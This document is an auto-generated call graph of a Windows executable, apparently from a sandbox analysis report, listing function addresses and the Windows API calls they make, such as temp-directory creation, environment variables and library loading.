                                                  Signature Coverage:12.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:63
calls 14434->14437 14605 7ff79ea47f40 14435->14605 14439 7ff79ea43a10 14437->14439 14439->14435 14721 7ff79ea50f4c 14439->14721 14443 7ff79ea43b41 14445 7ff79ea43b65 14443->14445 14616 7ff79ea414f0 14443->14616 14450 7ff79ea43bbf 14445->14450 14445->14467 14623 7ff79ea489e0 14445->14623 14446 7ff79ea41cb0 103 API calls 14448 7ff79ea43a86 14446->14448 14447 7ff79ea47f40 31 API calls 14447->14435 14452 7ff79ea43a8a 14448->14452 14453 7ff79ea43ac8 14448->14453 14637 7ff79ea46ce0 14450->14637 14727 7ff79ea42b30 14452->14727 14453->14443 14747 7ff79ea43fa0 14453->14747 14455 7ff79ea43b9c 14459 7ff79ea43bb2 SetDllDirectoryW 14455->14459 14460 7ff79ea43ba1 14455->14460 14459->14450 14463 7ff79ea42b30 18 API calls 14460->14463 14461 7ff79ea43c17 14464 7ff79ea46c60 14 API calls 14461->14464 14463->14467 14468 7ff79ea43c0b 14464->14468 14466 7ff79ea43ae6 14473 7ff79ea42b30 18 API calls 14466->14473 14738 7ff79ea4bbf0 14467->14738 14471 7ff79ea43cd6 14468->14471 14483 7ff79ea43c2a 14468->14483 14469 7ff79ea43bd9 14469->14461 14785 7ff79ea464e0 14469->14785 14641 7ff79ea434a0 14471->14641 14473->14467 14476 7ff79ea43b19 14763 7ff79ea4deac 14476->14763 14480 7ff79ea43c0d 14484 7ff79ea46740 FreeLibrary 14480->14484 14483->14467 14814 7ff79ea43440 14483->14814 14484->14461 14487 7ff79ea43bfc 14808 7ff79ea46b30 14487->14808 14488 7ff79ea47a60 42 API calls 14492 7ff79ea43d0a 14488->14492 14490 7ff79ea43cb1 14494 7ff79ea46740 FreeLibrary 14490->14494 14661 7ff79ea47f80 14492->14661 14496 7ff79ea43cc5 14494->14496 14498 7ff79ea46c60 14 API calls 14496->14498 14498->14467 14506 7ff79ea55b9c 14505->14506 14507 7ff79ea55bae 14505->14507 14506->14401 17023 7ff79ea56408 14507->17023 14510 7ff79ea4c63c GetModuleHandleW 14511 7ff79ea4c64d 14510->14511 14511->14409 14513 7ff79ea4c321 14512->14513 14514 7ff79ea4c0d0 14513->14514 14515 7ff79ea4d6dc __scrt_initialize_crt 7 API calls 14513->14515 14514->14399 14515->14514 14517 7ff79ea4c4d2 _wfindfirst32i64 __scrt_get_show_window_mode 
14516->14517 14518 7ff79ea4c4f1 RtlCaptureContext RtlLookupFunctionEntry 14517->14518 14519 7ff79ea4c51a RtlVirtualUnwind 14518->14519 14520 7ff79ea4c556 __scrt_get_show_window_mode 14518->14520 14519->14520 14521 7ff79ea4c588 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14520->14521 14522 7ff79ea4c5da _wfindfirst32i64 14521->14522 14522->14397 14524 7ff79ea4c19e __scrt_dllmain_crt_thread_attach 14523->14524 14524->14415 14524->14416 14526 7ff79ea4d6ee 14525->14526 14527 7ff79ea4d6e4 14525->14527 14526->14415 14531 7ff79ea4d964 14527->14531 14532 7ff79ea4d973 14531->14532 14533 7ff79ea4d6e9 14531->14533 14539 7ff79ea4db8c 14532->14539 14535 7ff79ea4d9bc 14533->14535 14536 7ff79ea4d9e7 14535->14536 14537 7ff79ea4d9eb 14536->14537 14538 7ff79ea4d9ca DeleteCriticalSection 14536->14538 14537->14526 14538->14536 14543 7ff79ea4d9f4 14539->14543 14548 7ff79ea4da38 try_get_function 14543->14548 14550 7ff79ea4db0e TlsFree 14543->14550 14544 7ff79ea4da66 LoadLibraryExW 14546 7ff79ea4dadd 14544->14546 14547 7ff79ea4da87 GetLastError 14544->14547 14545 7ff79ea4dafd GetProcAddress 14545->14550 14546->14545 14549 7ff79ea4daf4 FreeLibrary 14546->14549 14547->14548 14548->14544 14548->14545 14548->14550 14551 7ff79ea4daa9 LoadLibraryExW 14548->14551 14549->14545 14551->14546 14551->14548 14553 7ff79ea4cff0 14552->14553 14553->14420 14553->14553 14556 7ff79ea485cf 14554->14556 14555 7ff79ea485d7 14555->14424 14556->14555 14557 7ff79ea48620 WideCharToMultiByte 14556->14557 14559 7ff79ea48676 WideCharToMultiByte 14556->14559 14560 7ff79ea486c7 14556->14560 14557->14556 14557->14560 14559->14556 14559->14560 14852 7ff79ea429e0 14560->14852 14561 7ff79ea486f3 14562 7ff79ea48711 14561->14562 14564 7ff79ea50f4c __vcrt_freefls 14 API calls 14561->14564 14563 7ff79ea50f4c __vcrt_freefls 14 API calls 14562->14563 14563->14555 14564->14561 14569 7ff79ea5b62c 14565->14569 14566 7ff79ea5b6af 14888 7ff79ea5137c 14566->14888 14569->14566 14571 7ff79ea5b670 14569->14571 
14881 7ff79ea5b508 14571->14881 14574 7ff79ea41eb0 14575 7ff79ea41ec5 14574->14575 14576 7ff79ea41ee0 14575->14576 14997 7ff79ea42890 14575->14997 14576->14467 14578 7ff79ea43e90 14576->14578 14579 7ff79ea4bb90 14578->14579 14580 7ff79ea43e9c GetModuleFileNameW 14579->14580 14581 7ff79ea43ecb 14580->14581 14582 7ff79ea43ee2 14580->14582 14583 7ff79ea429e0 16 API calls 14581->14583 15033 7ff79ea48af0 14582->15033 14585 7ff79ea43ede 14583->14585 14588 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14585->14588 14587 7ff79ea42b30 18 API calls 14587->14585 14589 7ff79ea43f1f 14588->14589 14589->14432 14591 7ff79ea47a6a 14590->14591 14592 7ff79ea489e0 16 API calls 14591->14592 14593 7ff79ea47a8c GetEnvironmentVariableW 14592->14593 14594 7ff79ea47af6 14593->14594 14595 7ff79ea47aa4 ExpandEnvironmentStringsW 14593->14595 14596 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14594->14596 14597 7ff79ea48af0 18 API calls 14595->14597 14598 7ff79ea47b08 14596->14598 14599 7ff79ea47acc 14597->14599 14598->14434 14599->14594 14600 7ff79ea47ad6 14599->14600 15044 7ff79ea56430 14600->15044 14603 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14604 7ff79ea47aee 14603->14604 14604->14434 14606 7ff79ea489e0 16 API calls 14605->14606 14607 7ff79ea47f57 SetEnvironmentVariableW 14606->14607 14608 7ff79ea50f4c __vcrt_freefls 14 API calls 14607->14608 14609 7ff79ea43a50 14608->14609 14610 7ff79ea41cb0 14609->14610 14612 7ff79ea41cbe 14610->14612 14611 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14613 7ff79ea41e6d 14611->14613 14615 7ff79ea41d2d 14612->14615 15060 7ff79ea41aa0 14612->15060 14613->14443 14613->14446 14615->14611 14617 7ff79ea41506 14616->14617 14620 7ff79ea4157f 14616->14620 15112 7ff79ea47850 14617->15112 14620->14445 14621 7ff79ea42b30 18 API calls 14622 7ff79ea41564 14621->14622 14622->14445 14624 7ff79ea48a87 MultiByteToWideChar 14623->14624 14625 7ff79ea48a01 MultiByteToWideChar 14623->14625 14628 7ff79ea48aaa 14624->14628 14629 7ff79ea48acf 14624->14629 14626 7ff79ea48a4c 
14625->14626 14627 7ff79ea48a27 14625->14627 14626->14624 14634 7ff79ea48a62 14626->14634 14630 7ff79ea429e0 14 API calls 14627->14630 14631 7ff79ea429e0 14 API calls 14628->14631 14629->14455 14632 7ff79ea48a3a 14630->14632 14633 7ff79ea48abd 14631->14633 14632->14455 14633->14455 14635 7ff79ea429e0 14 API calls 14634->14635 14636 7ff79ea48a75 14635->14636 14636->14455 14638 7ff79ea46cf5 14637->14638 14639 7ff79ea43bc4 14638->14639 14640 7ff79ea42890 40 API calls 14638->14640 14639->14461 14775 7ff79ea46990 14639->14775 14640->14639 14647 7ff79ea43513 14641->14647 14649 7ff79ea43554 14641->14649 14642 7ff79ea43593 14644 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14642->14644 14643 7ff79ea41e80 14 API calls 14643->14649 14645 7ff79ea435a5 14644->14645 14645->14467 14650 7ff79ea47ed0 14645->14650 14647->14649 15472 7ff79ea41710 14647->15472 15514 7ff79ea42d50 14647->15514 14649->14642 14649->14643 14651 7ff79ea489e0 16 API calls 14650->14651 14652 7ff79ea47eef 14651->14652 14653 7ff79ea489e0 16 API calls 14652->14653 14654 7ff79ea47eff 14653->14654 14655 7ff79ea53a04 31 API calls 14654->14655 14656 7ff79ea47f0d 14655->14656 14657 7ff79ea50f4c __vcrt_freefls 14 API calls 14656->14657 14658 7ff79ea47f17 14657->14658 14659 7ff79ea50f4c __vcrt_freefls 14 API calls 14658->14659 14660 7ff79ea43cfe 14659->14660 14660->14488 14662 7ff79ea47f90 14661->14662 14663 7ff79ea489e0 16 API calls 14662->14663 14664 7ff79ea47fc1 SetConsoleCtrlHandler GetStartupInfoW 14663->14664 14665 7ff79ea48022 14664->14665 16075 7ff79ea564a8 14665->16075 14722 7ff79ea56830 14721->14722 14723 7ff79ea43a2f 14722->14723 14724 7ff79ea56835 RtlRestoreThreadPreferredUILanguages 14722->14724 14723->14447 14724->14723 14725 7ff79ea56850 14724->14725 14726 7ff79ea5137c _wfindfirst32i64 13 API calls 14725->14726 14726->14723 14728 7ff79ea42b50 __scrt_get_show_window_mode 14727->14728 14729 7ff79ea489e0 16 API calls 14728->14729 14730 7ff79ea42bca 14729->14730 14731 7ff79ea42c09 MessageBoxA 14730->14731 
14732 7ff79ea42bcf 14730->14732 14734 7ff79ea42c23 14731->14734 14733 7ff79ea489e0 16 API calls 14732->14733 14735 7ff79ea42be9 MessageBoxW 14733->14735 14736 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14734->14736 14735->14734 14737 7ff79ea42c33 14736->14737 14737->14467 14740 7ff79ea4bbf9 14738->14740 14739 7ff79ea43ab6 14739->14510 14740->14739 14741 7ff79ea4bc50 IsProcessorFeaturePresent 14740->14741 14742 7ff79ea4bc68 14741->14742 16135 7ff79ea4be44 RtlCaptureContext 14742->16135 14748 7ff79ea43fac 14747->14748 14749 7ff79ea489e0 16 API calls 14748->14749 14750 7ff79ea43fd7 14749->14750 14751 7ff79ea489e0 16 API calls 14750->14751 14752 7ff79ea43fea 14751->14752 16140 7ff79ea52398 14752->16140 14755 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14756 7ff79ea43ade 14755->14756 14756->14466 14757 7ff79ea481b0 14756->14757 14761 7ff79ea481d4 14757->14761 14758 7ff79ea482ab 14759 7ff79ea50f4c __vcrt_freefls 14 API calls 14758->14759 14760 7ff79ea43b14 14759->14760 14760->14443 14760->14476 14761->14758 14762 7ff79ea4e1c8 _fread_nolock 46 API calls 14761->14762 14762->14761 14764 7ff79ea4dec3 14763->14764 14765 7ff79ea4dee1 14763->14765 14766 7ff79ea5137c _wfindfirst32i64 13 API calls 14764->14766 14773 7ff79ea4ded3 14765->14773 16581 7ff79ea512ac EnterCriticalSection 14765->16581 14767 7ff79ea4dec8 14766->14767 14769 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 14767->14769 14769->14773 14773->14466 14776 7ff79ea469ca 14775->14776 14777 7ff79ea469b3 14775->14777 14776->14469 14777->14776 16582 7ff79ea415a0 14777->16582 14779 7ff79ea469d4 14779->14776 14780 7ff79ea46b0f 14779->14780 14782 7ff79ea46aa5 memcpy_s 14779->14782 14781 7ff79ea42b30 18 API calls 14780->14781 14781->14776 14783 7ff79ea50f4c __vcrt_freefls 14 API calls 14782->14783 14784 7ff79ea46afd 14783->14784 14784->14469 14790 7ff79ea464fa memcpy_s 14785->14790 14787 7ff79ea4660f 14791 7ff79ea50f4c __vcrt_freefls 14 API calls 14787->14791 14788 7ff79ea46646 14789 7ff79ea42b30 18 API calls 14788->14789 
14789->14787 14790->14787 14790->14788 14790->14790 14795 7ff79ea41710 127 API calls 14790->14795 14796 7ff79ea4662c 14790->14796 16606 7ff79ea41950 14790->16606 14792 7ff79ea46707 14791->14792 14793 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14792->14793 14794 7ff79ea43bea 14793->14794 14794->14480 14798 7ff79ea46460 14794->14798 14795->14790 14797 7ff79ea42b30 18 API calls 14796->14797 14797->14787 16610 7ff79ea48160 14798->16610 14801 7ff79ea48160 31 API calls 14802 7ff79ea4648f 14801->14802 14803 7ff79ea464c5 14802->14803 14805 7ff79ea464a7 14802->14805 14804 7ff79ea42b30 18 API calls 14803->14804 14806 7ff79ea43bf8 14804->14806 16615 7ff79ea46df0 GetProcAddress 14805->16615 14806->14480 14806->14487 14809 7ff79ea46b54 14808->14809 14810 7ff79ea42b30 18 API calls 14809->14810 14813 7ff79ea46bca 14809->14813 14811 7ff79ea46bae 14810->14811 14812 7ff79ea46740 FreeLibrary 14811->14812 14812->14813 14813->14468 16674 7ff79ea45ab0 14814->16674 14817 7ff79ea4348d 14817->14490 14821 7ff79ea43470 14821->14817 16749 7ff79ea45980 14821->16749 14867 7ff79ea4bb90 14852->14867 14855 7ff79ea42a29 14869 7ff79ea48460 14855->14869 14857 7ff79ea42a60 __scrt_get_show_window_mode 14858 7ff79ea489e0 13 API calls 14857->14858 14859 7ff79ea42ab5 14858->14859 14860 7ff79ea42aba 14859->14860 14861 7ff79ea42af4 MessageBoxA 14859->14861 14862 7ff79ea489e0 13 API calls 14860->14862 14863 7ff79ea42b0e 14861->14863 14864 7ff79ea42ad4 MessageBoxW 14862->14864 14865 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14863->14865 14864->14863 14866 7ff79ea42b1e 14865->14866 14866->14561 14868 7ff79ea429fc GetLastError 14867->14868 14868->14855 14870 7ff79ea4846c 14869->14870 14871 7ff79ea4848d FormatMessageW 14870->14871 14872 7ff79ea48487 GetLastError 14870->14872 14873 7ff79ea484dc WideCharToMultiByte 14871->14873 14874 7ff79ea484c0 14871->14874 14872->14871 14876 7ff79ea48516 14873->14876 14878 7ff79ea484d3 14873->14878 14875 7ff79ea429e0 13 API calls 14874->14875 14875->14878 14877 7ff79ea429e0 13 
API calls 14876->14877 14877->14878 14879 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14878->14879 14880 7ff79ea48545 14879->14880 14880->14857 14894 7ff79ea512ac EnterCriticalSection 14881->14894 14895 7ff79ea597ac GetLastError 14888->14895 14890 7ff79ea51385 14891 7ff79ea567c8 14890->14891 14977 7ff79ea56718 14891->14977 14896 7ff79ea597ce 14895->14896 14897 7ff79ea597d3 14895->14897 14918 7ff79ea5aaf0 14896->14918 14901 7ff79ea597db SetLastError 14897->14901 14922 7ff79ea5ab38 14897->14922 14901->14890 14905 7ff79ea59827 14908 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14905->14908 14906 7ff79ea59817 14907 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14906->14907 14909 7ff79ea5981e 14907->14909 14910 7ff79ea5982f 14908->14910 14934 7ff79ea56830 14909->14934 14911 7ff79ea59833 14910->14911 14912 7ff79ea59845 14910->14912 14915 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14911->14915 14939 7ff79ea593d4 14912->14939 14915->14909 14944 7ff79ea5a720 14918->14944 14923 7ff79ea5a720 try_get_function 5 API calls 14922->14923 14924 7ff79ea5ab66 14923->14924 14925 7ff79ea5ab78 TlsSetValue 14924->14925 14926 7ff79ea597f6 14924->14926 14925->14926 14926->14901 14927 7ff79ea5a6a8 14926->14927 14932 7ff79ea5a6b9 _invalid_parameter_noinfo 14927->14932 14928 7ff79ea5a70a 14930 7ff79ea5137c _wfindfirst32i64 12 API calls 14928->14930 14929 7ff79ea5a6ee RtlAllocateHeap 14931 7ff79ea59809 14929->14931 14929->14932 14930->14931 14931->14905 14931->14906 14932->14928 14932->14929 14954 7ff79ea5ef50 14932->14954 14935 7ff79ea56867 14934->14935 14936 7ff79ea56835 RtlRestoreThreadPreferredUILanguages 14934->14936 14935->14901 14936->14935 14937 7ff79ea56850 14936->14937 14938 7ff79ea5137c _wfindfirst32i64 12 API calls 14937->14938 14938->14935 14963 7ff79ea592ac 14939->14963 14945 7ff79ea5a781 TlsGetValue 14944->14945 14952 7ff79ea5a77c try_get_function 14944->14952 14946 7ff79ea5a864 14946->14945 14948 7ff79ea5a872 GetProcAddress 14946->14948 14947 7ff79ea5a7b0 
LoadLibraryW 14949 7ff79ea5a7d1 GetLastError 14947->14949 14947->14952 14950 7ff79ea5a883 14948->14950 14949->14952 14950->14945 14951 7ff79ea5a849 FreeLibrary 14951->14952 14952->14945 14952->14946 14952->14947 14952->14951 14953 7ff79ea5a80b LoadLibraryExW 14952->14953 14953->14952 14957 7ff79ea5ef80 14954->14957 14962 7ff79ea5c1c8 EnterCriticalSection 14957->14962 14975 7ff79ea5c1c8 EnterCriticalSection 14963->14975 14978 7ff79ea597ac _invalid_parameter_noinfo 13 API calls 14977->14978 14979 7ff79ea5673d 14978->14979 14981 7ff79ea4399b 14979->14981 14985 7ff79ea567e8 IsProcessorFeaturePresent 14979->14985 14981->14574 14986 7ff79ea567fb 14985->14986 14989 7ff79ea565b4 14986->14989 14990 7ff79ea565ee _wfindfirst32i64 __scrt_get_show_window_mode 14989->14990 14991 7ff79ea56616 RtlCaptureContext RtlLookupFunctionEntry 14990->14991 14992 7ff79ea56686 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14991->14992 14993 7ff79ea56650 RtlVirtualUnwind 14991->14993 14994 7ff79ea566d8 _wfindfirst32i64 14992->14994 14993->14992 14995 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14994->14995 14996 7ff79ea566f7 GetCurrentProcess TerminateProcess 14995->14996 14998 7ff79ea428ac 14997->14998 14999 7ff79ea5137c _wfindfirst32i64 13 API calls 14998->14999 15000 7ff79ea42904 14999->15000 15012 7ff79ea5139c 15000->15012 15002 7ff79ea4290b __scrt_get_show_window_mode 15003 7ff79ea489e0 16 API calls 15002->15003 15004 7ff79ea42960 15003->15004 15005 7ff79ea4299f MessageBoxA 15004->15005 15006 7ff79ea42965 15004->15006 15007 7ff79ea429b9 15005->15007 15008 7ff79ea489e0 16 API calls 15006->15008 15009 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15007->15009 15010 7ff79ea4297f MessageBoxW 15008->15010 15011 7ff79ea429c9 15009->15011 15010->15007 15011->14576 15013 7ff79ea597ac _invalid_parameter_noinfo 13 API calls 15012->15013 15014 7ff79ea513ae 15013->15014 15015 7ff79ea513b6 15014->15015 15016 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 15014->15016 15019 
7ff79ea513e9 15014->15019 15015->15002 15017 7ff79ea513de 15016->15017 15018 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15017->15018 15018->15019 15019->15015 15024 7ff79ea5ae68 15019->15024 15022 7ff79ea567e8 _wfindfirst32i64 17 API calls 15023 7ff79ea51477 15022->15023 15029 7ff79ea5ae80 15024->15029 15025 7ff79ea5ae85 15026 7ff79ea51455 15025->15026 15027 7ff79ea5137c _wfindfirst32i64 13 API calls 15025->15027 15026->15015 15026->15022 15028 7ff79ea5ae8f 15027->15028 15030 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15028->15030 15029->15025 15029->15026 15031 7ff79ea5aeca 15029->15031 15030->15026 15031->15026 15032 7ff79ea5137c _wfindfirst32i64 13 API calls 15031->15032 15032->15028 15034 7ff79ea48b14 WideCharToMultiByte 15033->15034 15035 7ff79ea48b82 WideCharToMultiByte 15033->15035 15036 7ff79ea48b3e 15034->15036 15037 7ff79ea48b55 15034->15037 15038 7ff79ea43ef5 15035->15038 15039 7ff79ea48baf 15035->15039 15040 7ff79ea429e0 16 API calls 15036->15040 15037->15035 15042 7ff79ea48b6b 15037->15042 15038->14585 15038->14587 15041 7ff79ea429e0 16 API calls 15039->15041 15040->15038 15041->15038 15043 7ff79ea429e0 16 API calls 15042->15043 15043->15038 15045 7ff79ea56447 15044->15045 15048 7ff79ea47ade 15044->15048 15045->15048 15051 7ff79ea564d0 15045->15051 15048->14603 15049 7ff79ea567e8 _wfindfirst32i64 17 API calls 15050 7ff79ea564a4 15049->15050 15052 7ff79ea564dd 15051->15052 15053 7ff79ea564e7 15051->15053 15052->15053 15057 7ff79ea56502 15052->15057 15054 7ff79ea5137c _wfindfirst32i64 13 API calls 15053->15054 15059 7ff79ea564ee 15054->15059 15055 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15056 7ff79ea56474 15055->15056 15056->15048 15056->15049 15057->15056 15058 7ff79ea5137c _wfindfirst32i64 13 API calls 15057->15058 15058->15059 15059->15055 15061 7ff79ea43fa0 98 API calls 15060->15061 15062 7ff79ea41ad6 15061->15062 15063 7ff79ea481b0 47 API calls 15062->15063 15068 7ff79ea41c84 15062->15068 15065 
7ff79ea41b0e 15063->15065 15064 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15066 7ff79ea41c98 15064->15066 15069 7ff79ea41b2c 15065->15069 15070 7ff79ea41b44 15065->15070 15087 7ff79ea41b3f 15065->15087 15066->14615 15067 7ff79ea4deac 64 API calls 15067->15068 15068->15064 15071 7ff79ea42890 40 API calls 15069->15071 15089 7ff79ea4e1c8 15070->15089 15071->15087 15074 7ff79ea41b5f 15075 7ff79ea42890 40 API calls 15074->15075 15075->15087 15076 7ff79ea41b77 15077 7ff79ea41bee 15076->15077 15078 7ff79ea41bd6 15076->15078 15080 7ff79ea4e1c8 _fread_nolock 46 API calls 15077->15080 15079 7ff79ea42890 40 API calls 15078->15079 15079->15087 15081 7ff79ea41c03 15080->15081 15082 7ff79ea41c09 15081->15082 15083 7ff79ea41c1e 15081->15083 15084 7ff79ea42890 40 API calls 15082->15084 15092 7ff79ea4df3c 15083->15092 15084->15087 15087->15067 15088 7ff79ea42b30 18 API calls 15088->15087 15098 7ff79ea4e1e8 15089->15098 15093 7ff79ea4df45 15092->15093 15097 7ff79ea41c32 15092->15097 15094 7ff79ea5137c _wfindfirst32i64 13 API calls 15093->15094 15095 7ff79ea4df4a 15094->15095 15096 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15095->15096 15096->15097 15097->15087 15097->15088 15099 7ff79ea41b59 15098->15099 15100 7ff79ea4e212 15098->15100 15099->15074 15099->15076 15100->15099 15101 7ff79ea4e25e 15100->15101 15102 7ff79ea4e221 __scrt_get_show_window_mode 15100->15102 15111 7ff79ea512ac EnterCriticalSection 15101->15111 15104 7ff79ea5137c _wfindfirst32i64 13 API calls 15102->15104 15106 7ff79ea4e236 15104->15106 15109 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15106->15109 15109->15099 15113 7ff79ea47866 15112->15113 15114 7ff79ea4788a 15113->15114 15115 7ff79ea478dd GetTempPathW 15113->15115 15116 7ff79ea47a60 42 API calls 15114->15116 15128 7ff79ea478f2 15115->15128 15117 7ff79ea47896 15116->15117 15188 7ff79ea47320 15117->15188 15122 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15124 7ff79ea4154f 15122->15124 15124->14620 15124->14621 15126 7ff79ea50f4c __vcrt_freefls 
14 API calls 15127 7ff79ea478c6 15126->15127 15127->15115 15130 7ff79ea478ca 15127->15130 15129 7ff79ea479b6 15128->15129 15133 7ff79ea50f4c __vcrt_freefls 14 API calls 15128->15133 15137 7ff79ea47941 15128->15137 15167 7ff79ea54684 15128->15167 15170 7ff79ea48850 15128->15170 15132 7ff79ea48af0 18 API calls 15129->15132 15131 7ff79ea42b30 18 API calls 15130->15131 15134 7ff79ea478d6 15131->15134 15135 7ff79ea479c7 15132->15135 15133->15128 15166 7ff79ea47992 15134->15166 15136 7ff79ea50f4c __vcrt_freefls 14 API calls 15135->15136 15138 7ff79ea479cf 15136->15138 15139 7ff79ea489e0 16 API calls 15137->15139 15137->15166 15141 7ff79ea489e0 16 API calls 15138->15141 15138->15166 15140 7ff79ea47957 15139->15140 15142 7ff79ea47999 SetEnvironmentVariableW 15140->15142 15143 7ff79ea4795c 15140->15143 15144 7ff79ea479e5 15141->15144 15148 7ff79ea50f4c __vcrt_freefls 14 API calls 15142->15148 15145 7ff79ea489e0 16 API calls 15143->15145 15146 7ff79ea479ea 15144->15146 15147 7ff79ea47a1d SetEnvironmentVariableW 15144->15147 15150 7ff79ea4796c 15145->15150 15151 7ff79ea489e0 16 API calls 15146->15151 15149 7ff79ea47a18 15147->15149 15148->15166 15152 7ff79ea50f4c __vcrt_freefls 14 API calls 15149->15152 15153 7ff79ea53a04 31 API calls 15150->15153 15154 7ff79ea479fa 15151->15154 15152->15166 15155 7ff79ea4797a 15153->15155 15156 7ff79ea53a04 31 API calls 15154->15156 15157 7ff79ea50f4c __vcrt_freefls 14 API calls 15155->15157 15158 7ff79ea47a08 15156->15158 15159 7ff79ea47982 15157->15159 15160 7ff79ea50f4c __vcrt_freefls 14 API calls 15158->15160 15161 7ff79ea50f4c __vcrt_freefls 14 API calls 15159->15161 15162 7ff79ea47a10 15160->15162 15164 7ff79ea4798a 15161->15164 15163 7ff79ea50f4c __vcrt_freefls 14 API calls 15162->15163 15163->15149 15165 7ff79ea50f4c __vcrt_freefls 14 API calls 15164->15165 15165->15166 15166->15122 15223 7ff79ea542e8 15167->15223 15171 7ff79ea4bb90 15170->15171 15172 7ff79ea48860 GetCurrentProcess OpenProcessToken 15171->15172 15173 7ff79ea488ab 
GetTokenInformation 15172->15173 15174 7ff79ea48921 15172->15174 15175 7ff79ea488cd GetLastError 15173->15175 15176 7ff79ea488d8 15173->15176 15177 7ff79ea50f4c __vcrt_freefls 14 API calls 15174->15177 15175->15174 15175->15176 15176->15174 15181 7ff79ea488ee GetTokenInformation 15176->15181 15178 7ff79ea48929 15177->15178 15179 7ff79ea4893a 15178->15179 15180 7ff79ea48934 FindCloseChangeNotification 15178->15180 15183 7ff79ea48963 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 15179->15183 15180->15179 15181->15174 15182 7ff79ea48914 ConvertSidToStringSidW 15181->15182 15182->15174 15184 7ff79ea489a8 15183->15184 15185 7ff79ea48996 CreateDirectoryW 15183->15185 15186 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15184->15186 15185->15184 15187 7ff79ea489c1 15186->15187 15187->15128 15189 7ff79ea4732c 15188->15189 15190 7ff79ea489e0 16 API calls 15189->15190 15191 7ff79ea4734e 15190->15191 15192 7ff79ea47369 ExpandEnvironmentStringsW 15191->15192 15193 7ff79ea47356 15191->15193 15195 7ff79ea50f4c __vcrt_freefls 14 API calls 15192->15195 15194 7ff79ea42b30 18 API calls 15193->15194 15196 7ff79ea47362 15194->15196 15197 7ff79ea4738f 15195->15197 15201 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15196->15201 15198 7ff79ea473a6 15197->15198 15199 7ff79ea47393 15197->15199 15203 7ff79ea473c0 15198->15203 15204 7ff79ea473b4 15198->15204 15200 7ff79ea42b30 18 API calls 15199->15200 15200->15196 15202 7ff79ea47488 15201->15202 15202->15166 15213 7ff79ea53a04 15202->15213 15354 7ff79ea52218 15203->15354 15347 7ff79ea535b4 15204->15347 15207 7ff79ea473be 15208 7ff79ea473da 15207->15208 15211 7ff79ea473ed __scrt_get_show_window_mode 15207->15211 15209 7ff79ea42b30 18 API calls 15208->15209 15209->15196 15210 7ff79ea47462 CreateDirectoryW 15210->15196 15211->15210 15212 7ff79ea4743c CreateDirectoryW 15211->15212 15212->15211 15214 7ff79ea53a24 15213->15214 15215 7ff79ea53a11 15213->15215 15464 7ff79ea53680 15214->15464 15216 7ff79ea5137c _wfindfirst32i64 13 API calls 
15215->15216 15218 7ff79ea53a16 15216->15218 15219 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15218->15219 15221 7ff79ea478bc 15219->15221 15221->15126 15266 7ff79ea5d04c 15223->15266 15316 7ff79ea5cdc8 15266->15316 15337 7ff79ea5c1c8 EnterCriticalSection 15316->15337 15348 7ff79ea535d2 15347->15348 15351 7ff79ea53605 15347->15351 15348->15351 15368 7ff79ea5c364 15348->15368 15351->15207 15352 7ff79ea567e8 _wfindfirst32i64 17 API calls 15353 7ff79ea53635 15352->15353 15355 7ff79ea52237 15354->15355 15356 7ff79ea522a0 15354->15356 15355->15356 15357 7ff79ea5223c 15355->15357 15404 7ff79ea5b9d0 15356->15404 15359 7ff79ea5226c 15357->15359 15360 7ff79ea5224f 15357->15360 15385 7ff79ea5204c GetFullPathNameW 15359->15385 15377 7ff79ea51fd8 GetFullPathNameW 15360->15377 15365 7ff79ea52264 15365->15207 15366 7ff79ea5228a 15366->15365 15367 7ff79ea50f4c __vcrt_freefls 14 API calls 15366->15367 15367->15365 15369 7ff79ea5c37b 15368->15369 15370 7ff79ea5c371 15368->15370 15371 7ff79ea5137c _wfindfirst32i64 13 API calls 15369->15371 15370->15369 15373 7ff79ea5c397 15370->15373 15376 7ff79ea5c383 15371->15376 15372 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15374 7ff79ea53601 15372->15374 15373->15374 15375 7ff79ea5137c _wfindfirst32i64 13 API calls 15373->15375 15374->15351 15374->15352 15375->15376 15376->15372 15378 7ff79ea51ffe GetLastError 15377->15378 15379 7ff79ea52014 15377->15379 15380 7ff79ea5130c _fread_nolock 13 API calls 15378->15380 15383 7ff79ea5137c _wfindfirst32i64 13 API calls 15379->15383 15384 7ff79ea52010 15379->15384 15381 7ff79ea5200b 15380->15381 15382 7ff79ea5137c _wfindfirst32i64 13 API calls 15381->15382 15382->15384 15383->15384 15384->15365 15386 7ff79ea52099 15385->15386 15387 7ff79ea52083 GetLastError 15385->15387 15389 7ff79ea520b7 15386->15389 15391 7ff79ea50f4c __vcrt_freefls 14 API calls 15386->15391 15394 7ff79ea52095 15386->15394 15388 7ff79ea5130c _fread_nolock 13 API calls 15387->15388 15390 7ff79ea52090 15388->15390 
